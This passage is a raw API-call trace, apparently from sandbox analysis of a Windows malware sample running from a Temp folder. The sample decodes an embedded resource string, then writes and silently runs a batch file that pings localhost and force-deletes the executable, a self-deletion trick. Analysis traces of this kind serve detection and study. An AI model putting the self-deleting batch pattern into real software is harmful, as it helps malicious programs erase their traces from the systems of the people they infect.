returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.823] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.823] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.823] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.823] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.823] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.823] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.823] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4071a4, lpParameter=0x14b0df0, dwCreationFlags=0x4, lpThreadId=0x14cdd84 | out: lpThreadId=0x14cdd84*=0xaf8) returned 0xb8 [0093.823] SetThreadPriority (hThread=0xb8, nPriority=0) returned 1 [0093.823] ResumeThread (hThread=0xb8) returned 0x1 [0093.823] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xea60) returned 0x0 [0096.638] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa44, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 0x30 [0096.638] FindResourceW (hModule=0x400000, lpName="STCLR", lpType=0xa) returned 0x51c510 [0096.639] LoadResource (hModule=0x400000, hResInfo=0x51c510) returned 0x5187d4 [0096.639] SizeofResource (hModule=0x400000, hResInfo=0x51c510) returned 0x53 [0096.639] LockResource (hResData=0x5187d4) returned 0x5187d4 [0096.639] FreeResource (hResData=0x5187d4) returned 0 [0096.639] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0096.639] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0096.639] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0096.639] LockResource (hResData=0x50d64c) returned 0x50d64c [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14d5120, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14d5120, cbMultiByte=38, lpWideCharStr=0x14cdf6c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0096.639] FreeResource (hResData=0x50d64c) returned 0 [0096.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0096.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14d5124, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0096.639] GetCurrentThreadId () returned 0xae8 [0096.639] GetCurrentThreadId () returned 0xae8 [0096.639] GetCurrentThreadId () returned 0xae8 [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14cde48, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14cde48, cbMultiByte=83, lpWideCharStr=0x146012c, cchWideChar=83 | out: lpWideCharStr="[RNDSTR].cmd\r\nping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"") returned 83 [0096.639] GetTickCount () returned 0x23265 [0096.639] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbb8 | out: lpPerformanceCount=0x12fbb8*=15342827274) returned 1 [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="D畔﮴\x12\x1c翻") returned 1 [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="G畔﮴\x12\x1c翻") returned 1 [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="a畔﮴\x12\x1c翻") returned 1 [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="e畔﮴\x12\x1c翻") returned 1 [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="z畔﮴\x12\x1c翻") returned 1 [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="H畔﮴\x12\x1c翻") returned 1 [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="h畔﮴\x12\x1c翻") returned 1 [0096.639] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="x畔﮴\x12\x1c翻") returned 1 [0096.639] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0096.639] CharUpperBuffW (in: lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0096.639] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", lpszShortPath=0x146c65c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe") returned 0x30 [0096.640] CharUpperBuffW (in: lpsz="ping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"\r\n", cchLength=0x47 | out: lpsz="PING -N 3 LOCALHOST\r\nDEL /F /Q \"[SELF_NAME]\"\r\nDEL /F /Q \"[SELF_NAME]\"\r\n") returned 0x47 [0096.640] CharUpperBuffW (in: lpsz="[SELF_NAME]", cchLength=0xb | out: lpsz="[SELF_NAME]") returned 0xb [0096.640] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\dgaezhhx.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0096.640] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0096.640] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0096.640] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x144fbd8, cbMultiByte=145, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"\r\n", lpUsedDefaultChar=0x0) returned 145 [0096.640] WriteFile (in: hFile=0xe8, lpBuffer=0x144fbd8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x12fb60, lpOverlapped=0x0 | out: lpBuffer=0x144fbd8*, lpNumberOfBytesWritten=0x12fb60*=0x91, lpOverlapped=0x0) returned 1 [0096.641] CloseHandle (hObject=0xe8) returned 1 [0096.642] GetCurrentThreadId () returned 0xae8 [0096.642] GetCurrentThreadId () returned 0xae8 [0096.642] GetCurrentThreadId () returned 0xae8 [0096.642] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0xec, hThread=0xe8, dwProcessId=0xb88, dwThreadId=0xb8c)) returned 1 [0096.705] CloseHandle (hObject=0xec) returned 1 [0096.705] CloseHandle (hObject=0xe8) returned 1 [0096.705] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0096.705] GetCurrentThreadId () returned 0xae8 [0096.705] GetCurrentThreadId () returned 0xae8 [0096.705] GetCurrentThreadId () returned 0xae8 [0096.705] GetCurrentThreadId () returned 0xae8 [0096.705] GetCurrentThreadId () returned 0xae8 [0096.705] GetCurrentThreadId () returned 0xae8 [0096.705] GetCurrentThreadId () returned 0xae8 [0096.705] GetCurrentThreadId () returned 0xae8 [0096.705] GetCurrentThreadId () returned 0xae8 [0096.705] GetCurrentThreadId () returned 0xae8 [0096.705] GetCurrentThreadId () returned 0xae8 [0096.705] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] GetCurrentThreadId () returned 0xae8 [0096.706] WSACleanup () returned 0 [0096.947] FreeLibrary (hLibModule=0x77380000) returned 1 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentProcess () returned 0xffffffff [0096.947] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x40, RegionSize=0x11d000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0096.947] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x51d000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x51d000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] ResetEvent (hEvent=0x88) returned 1 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] ResetEvent (hEvent=0x88) returned 1 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] CloseHandle (hObject=0x88) returned 1 [0096.947] CloseHandle (hObject=0x8c) returned 1 [0096.947] CloseHandle (hObject=0x84) returned 1 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetCurrentThreadId () returned 0xae8 [0096.947] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.947] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.947] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2e0)) [0096.948] GetLocalTime (in: lpSystemTime=0x12fc1c | out: 